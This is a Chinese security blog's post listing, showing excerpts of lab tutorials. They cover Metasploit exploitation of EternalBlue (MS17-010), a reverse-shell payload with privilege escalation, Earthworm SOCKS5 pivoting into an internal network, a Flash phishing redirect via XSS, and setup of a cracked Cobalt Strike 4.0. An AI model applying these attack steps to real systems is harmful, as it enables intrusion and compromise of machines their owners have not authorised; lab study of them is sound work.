- 博客(8)
- 收藏
- 关注
RSS订阅原创 Xshell远程连接linux详细步骤(小白讲解)
环境:Linux服务器我使用的是CentOS虚拟机 , IP: 192.168.50.224OK,废话不多说直接走流程前提权限首先打开Linux服务器,打开命令终端,切换成root权限????注意:密码输入这里是不显示的,所以一定要输入正确这一步很关键!!!!因为我在权限这里碰了很多灰,不是root权限连不上Xshell。。。(小伙伴们也可以试一下,有好方法及时留言)查看端口第二步,查看22端口是否开启。一般都是默认开启的哈,还是看一下以防万一。如果没开22端口也是连不上的。nets
2021-06-08 10:06:15
73690
38
原创 KaLi 永恒之蓝漏洞的利用
环境攻击机:Kali目标机:同网段下的win7过程第一步Kali终端启动msf,扫描目标机漏洞msfconsolesearch ms17_010use scanner/smb/smb_ms17_010 #或者use 1 用来扫描目标机是否存在这个漏洞show optionsset RHOSTS 目标机IPrun结果如下:第二步重新开一个Kali终端标签页,或者从第三行直接开始msfconsolesearch ms17_010use exploit/windows
2021-04-13 20:29:16
314
原创 EW(Eartworm)做Socks5代理内网穿透
环境攻击机在公网,目标机在内网,无法直接连接访问,就需要利用一个能同时连接内网和公网的受害机受害机开代理,在公网的攻击机就可以通过代理来访问在内网的目标机※抱歉我没有同时存在两个网段的,此文章只为做个过程演示!重在理解重在理解……攻击机:kali 192.168.50.183受害机:win10 192.168.50.225目标机:win7 192.168.50.25过程受害机里开代理(开代理之前关掉受害机的杀软,确保exe的文件存在)在此文件目录打开cmd
2021-01-18 17:03:26
525
1
原创 利用msf实现反弹shell与提权(细节过程秒懂)
环境攻击机:Kali ip:192.168.50.183靶机:Win7(x64)两者在同一个C段!!!!生成payload首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻在线快速生成payload网站这里的IP设置为KaliIP,端口不要与其他服务冲突接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以)把下载好的文件放至网页,由靶机win7通过访问网页下载mv reverse.exe /var/
2021-01-13 10:28:39
6269
1
原创 简单的Flash钓鱼页面跳转
环境win7虚拟机本机过程在win7虚拟机内:PHP打开js文件,将href改为虚拟机IP的网页回到本机,在www目录下新建一个htmlPHP打开html文件,插入跳转到虚拟机网页的XSS访问本机的html网页会发现跳转到了虚拟机IP...
2021-01-12 09:29:25
489
1
原创 kali2020切换root权限
背景Kali2020版本默认不是以root管理员身份运行的,在安装起用户名时有心的小伙伴就注意到了,是非root权限的普通用户。这在我们后续很多步骤都受到很大的限制,所以在这里一步一步教给大家怎么转换成root权限用户前提以下步骤的前提是已经完全安装好了KALI虚拟机。给还不会的小伙伴推荐一篇文章,讲的很详细(点击跳转)过程在重启进入如下图所示的页面后,按字母e键进入如下图所示的页面进行配置:在linux这一行,把框起的地方,改为:rw quiet splash init=/bin/b
2021-01-11 12:31:25
1836
1
原创 Cobalt Strike4.0小白安装及基础使用
环境1,win7虚拟机,打开phpstudy,开启web服务,将下载好的cs压缩包放在www目录下2,kali虚拟机,将cs压缩包下载到kali(如果能直接将下载好的压缩包拖进kali虚拟机也可以)安装过程wgrt 192.168.48.137/cs.zip(下载压缩包,这里的IP是win7的IP)unzip cs.zip (解压)ls (查看一下解压成功没有)cd cobaltstrike4.0-cracked(打开解压文件)chmod +x teamserver (提权)./te
2021-01-08 16:45:17
3663
1
原创 了解APT
APT是什么APT(Advanced Persistent Threat):高级持续威胁,主要特点有三个高级,持续,威胁。高级:技术手段高级,手法高级。持续:长达一个月甚至几年。威胁:存在危害。APT的攻击手法APT的攻击手法,在于隐匿自己,针对特定对象,长期、有计划性和组织性地窃取数据,此类攻击行为是传统安全检测系统无法有效检测发现,前沿防御方法是利用非商业化虚拟机分析技术,对各种邮件附件、文件进行深度的动态行为分析,发现利用系统漏洞等高级技术专门构造的恶意文件,从而发现和确认APT攻击行为。
2021-01-08 16:29:44
2005
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人